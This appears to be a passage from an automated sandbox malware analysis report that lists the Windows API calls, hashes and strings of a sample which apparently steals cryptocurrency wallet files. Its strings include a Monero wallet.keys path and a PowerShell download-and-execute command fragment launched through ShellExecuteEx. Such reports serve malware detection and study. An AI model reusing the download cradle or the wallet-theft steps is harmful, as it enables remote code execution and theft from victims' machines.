                    • lstrcat.KERNEL32(?,?), ref: 00BD4834
                    • lstrcat.KERNEL32(?,013BBAB8), ref: 00BD4847
                    • lstrcat.KERNEL32(?,?), ref: 00BD485B
                    • lstrcat.KERNEL32(?,013CD640), ref: 00BD486F
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8D90: GetFileAttributesA.KERNEL32(00000000,?,00BC1B54,?,?,00BE564C,?,?,00BE0E1F), ref: 00BD8D9F
                      • Part of subcall function 00BD4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BD4580
                      • Part of subcall function 00BD4570: RtlAllocateHeap.NTDLL(00000000), ref: 00BD4587
                      • Part of subcall function 00BD4570: wsprintfA.USER32 ref: 00BD45A6
                      • Part of subcall function 00BD4570: FindFirstFileA.KERNEL32(?,?), ref: 00BD45BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: f667d7e7ffa1794718070c2ac4fb90a4349de2de0acda2f604a3368c88cbca83
                    • Instruction ID: c7fbf9bbb9f3bb9ec95bea1491f1d3e6762df1318b11c14cf9674367fc69f612
                    • Opcode Fuzzy Hash: f667d7e7ffa1794718070c2ac4fb90a4349de2de0acda2f604a3368c88cbca83
                    • Instruction Fuzzy Hash: 0B3182B690030C5BCB14FBA0DC86EEDB3BCAB58300F4455D9B359A6181EE75D6C98BA1
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD2D85
                    Strings
                    • <, xrefs: 00BD2D39
                    • ')", xrefs: 00BD2CB3
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BD2D04
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BD2CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: e09f63fab336649b9eddefdd2cb26e6dd71e355c30cb4d5aa2d0b8836c3685ea
                    • Instruction ID: 86fc97f4d2d9854281d2619ab71d40f5471993fcb4cbe25cfeaaa71274158021
                    • Opcode Fuzzy Hash: e09f63fab336649b9eddefdd2cb26e6dd71e355c30cb4d5aa2d0b8836c3685ea
                    • Instruction Fuzzy Hash: 8C41DE71D102489ADB14FBA0C891BEDF7B8AF10300F4041AAE406B6291FF756A8ADF95
                    APIs
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BC9F41
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 73ab5d638e322f8100f8d414016e24b60feb4d5268cd4781f47a29537d92eebe
                    • Instruction ID: 9bfdfbc0d28d14e9a8942e10e2d02db04ffbe62330e453665833109b97435362
                    • Opcode Fuzzy Hash: 73ab5d638e322f8100f8d414016e24b60feb4d5268cd4781f47a29537d92eebe
                    • Instruction Fuzzy Hash: F0614070A1024C9BDB14EFA4CC96FEDB7F5AF54344F008458F90A6B291EBB46A45CB52
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,013CD680,00000000,00020119,?), ref: 00BD40F4
                    • RegQueryValueExA.ADVAPI32(?,013CE5C0,00000000,00000000,00000000,000000FF), ref: 00BD4118
                    • RegCloseKey.ADVAPI32(?), ref: 00BD4122
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4147
                    • lstrcat.KERNEL32(?,013CE5D8), ref: 00BD415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: fcd4f33bcf6a1c76f22a9acb24e677c587c8f00bca05ac1e33becfe9eb005c3d
                    • Instruction ID: 31d5483115ccdb60e512233d535e9cd2976d8cc40c41b660fdd4226fbb940a31
                    • Opcode Fuzzy Hash: fcd4f33bcf6a1c76f22a9acb24e677c587c8f00bca05ac1e33becfe9eb005c3d
                    • Instruction Fuzzy Hash: FD418DB690020CABDB14EBA0DC56FFD737DA758300F04459DB61567181EA759BCC8BE2
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 00BD696C
                    • sscanf.NTDLL ref: 00BD6999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BD69B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BD69C0
                    • ExitProcess.KERNEL32 ref: 00BD69DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: 8776d30d15b7addbfbbf48e10df7a7664498405d313b6b3ae32ff91c45edb2df
                    • Instruction ID: e5aa4c852f6552c1f9c57523b61bdb76b5b6ff84f62488c07b367b3afb98631e
                    • Opcode Fuzzy Hash: 8776d30d15b7addbfbbf48e10df7a7664498405d313b6b3ae32ff91c45edb2df
                    • Instruction Fuzzy Hash: 1E21B875D1420CAFCF08EFE4D949AEEB7B9BF48300F04856AE406B3250EB355649CB69
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC3C8,00000000,00020119,?), ref: 00BD7E5E
                    • RegQueryValueExA.ADVAPI32(?,013CD8A0,00000000,00000000,000000FF,000000FF), ref: 00BD7E7F
                    • RegCloseKey.ADVAPI32(?), ref: 00BD7E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: dbd0b0a4262c4863cd4de71cf4fba71252e5d75f138d32b44185943128500757
                    • Instruction ID: 13318426046e7c032801c7e5607aa46436fc62f5381a320d65bd74592604eeee
                    • Opcode Fuzzy Hash: dbd0b0a4262c4863cd4de71cf4fba71252e5d75f138d32b44185943128500757
                    • Instruction Fuzzy Hash: CF118FB1A44309EFD704CB95DC89FBBFBBCEB44700F1081AAF605A7280EB7558448BA1
                    APIs
                    • StrStrA.SHLWAPI(013CE3E0,?,?,?,00BD140C,?,013CE3E0,00000000), ref: 00BD926C
                    • lstrcpyn.KERNEL32(00E0AB88,013CE3E0,013CE3E0,?,00BD140C,?,013CE3E0), ref: 00BD9290
                    • lstrlen.KERNEL32(?,?,00BD140C,?,013CE3E0), ref: 00BD92A7
                    • wsprintfA.USER32 ref: 00BD92C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: bdab0ce51117fac07b0f0614afa425562d28f82bd75c15c6fb16486cad705cf6
                    • Instruction ID: 43d70270baca50f68c4df0bae89bfe412998a9f2adfd68ba08dd358874289ea3
                    • Opcode Fuzzy Hash: bdab0ce51117fac07b0f0614afa425562d28f82bd75c15c6fb16486cad705cf6
                    • Instruction Fuzzy Hash: 31010C7550020CFFCB04DFECC988EAE7BB9EB44350F188158F909AB240C671AA84DB91
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BC12B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC12BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BC12D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BC12F5
                    • RegCloseKey.ADVAPI32(?), ref: 00BC12FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 422e30fd2e578190378a361f54775bf2a721c663e0fb897981e565f69f82bbe5
                    • Instruction ID: 68919327873eda5d3d06aba9fd956dd42e21cd9ff1a6dc5de50e216c07096426
                    • Opcode Fuzzy Hash: 422e30fd2e578190378a361f54775bf2a721c663e0fb897981e565f69f82bbe5
                    • Instruction Fuzzy Hash: BC011DB9A4030CBFDB04DFE5DC49FAEB7B8EB48701F048169FA05A7280D6719A458B61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: 239dbc79da72f4df27df8ddf3bfe9837a5da7f47ea6dc7d24e78e1e1649b3a85
                    • Instruction ID: a538c4378a45719f425a0d29082e23b35eb6504b3e482463bccae8e8d407518a
                    • Opcode Fuzzy Hash: 239dbc79da72f4df27df8ddf3bfe9837a5da7f47ea6dc7d24e78e1e1649b3a85
                    • Instruction Fuzzy Hash: B74105B150079D5EDB228B248D94FFBFFE89B45304F1444E9E9CA86282E2759A44DF60
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00BD6663
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00BD6726
                    • ExitProcess.KERNEL32 ref: 00BD6755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 40cc262e255cc264eb494755aece8f99343110874b178796ec3b4816a43056aa
                    • Instruction ID: 38469fdf51ba33b1881846a8d2e6bb215782568e523da28c46e6cefb06827f60
                    • Opcode Fuzzy Hash: 40cc262e255cc264eb494755aece8f99343110874b178796ec3b4816a43056aa
                    • Instruction Fuzzy Hash: 82312FB1801218ABDB14EB50DC95FDDB7B8AF44300F40519AF20976291EF756B88CF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BE0E28,00000000,?), ref: 00BD882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8836
                    • wsprintfA.USER32 ref: 00BD8850
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: a8bc9711592e06e814efe04f65560d747c3bd93833305abd88ea6961105bd158
                    • Instruction ID: 13ce8b28d5549c2fe0b4dbc2e0cbb9b3c34901607b7abb96f0c3fb690a01038b
                    • Opcode Fuzzy Hash: a8bc9711592e06e814efe04f65560d747c3bd93833305abd88ea6961105bd158
                    • Instruction Fuzzy Hash: 182172B1A40308AFDB04DF95DD49FAEBBB8FB48701F144159F605B7280D77A9940CBA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BD951E,00000000), ref: 00BD8D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8D62
                    • wsprintfW.USER32 ref: 00BD8D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: e61f0a7bc8e4f8f82992ec727a738bc8aa29c6dd562cd418e7c8bc37f61412bd
                    • Instruction ID: 5b7046516843ff007af777529b17ad98bf1403908a710f0386bfbee2004dd4d9
                    • Opcode Fuzzy Hash: e61f0a7bc8e4f8f82992ec727a738bc8aa29c6dd562cd418e7c8bc37f61412bd
                    • Instruction Fuzzy Hash: B3E08670A4030CBFC704DB95DC0DE5977B8EB04701F0441A4FD0997240DA725E449B62
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCA2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 00BCA3FF
                    • lstrlen.KERNEL32(00000000), ref: 00BCA6BC
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCA743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: dc596fab7794a28b57460ec7e31ee40eed650512a48969efc9271825794f8313
                    • Instruction ID: ca315cdc6c0857ed61db68234729c3f77a08b666fbcf15e1399674c9d11bcc8b
                    • Opcode Fuzzy Hash: dc596fab7794a28b57460ec7e31ee40eed650512a48969efc9271825794f8313
                    • Instruction Fuzzy Hash: 82E10E728101589ADB04FBA4DC92EEEB3BCAF14300F5081AAF51772191FF356A4DDB66
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BCD481
                    • lstrlen.KERNEL32(00000000), ref: 00BCD698
                    • lstrlen.KERNEL32(00000000), ref: 00BCD6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 00BCD72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 119ed57c61129b18dcb9d870c9313aeabfef647720c6836331ba868e6cd6e28a
                    • Instruction ID: 16d9d82df0dfe7cd4bdb00e21b18b2078eff5211e335e3fe258573e034234cdc
                    • Opcode Fuzzy Hash: 119ed57c61129b18dcb9d870c9313aeabfef647720c6836331ba868e6cd6e28a
                    • Instruction Fuzzy Hash: 519134718101489BCB04FBA4DC92EEEB3B8AF14300F5041BAF50772291FF356A49DB66
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
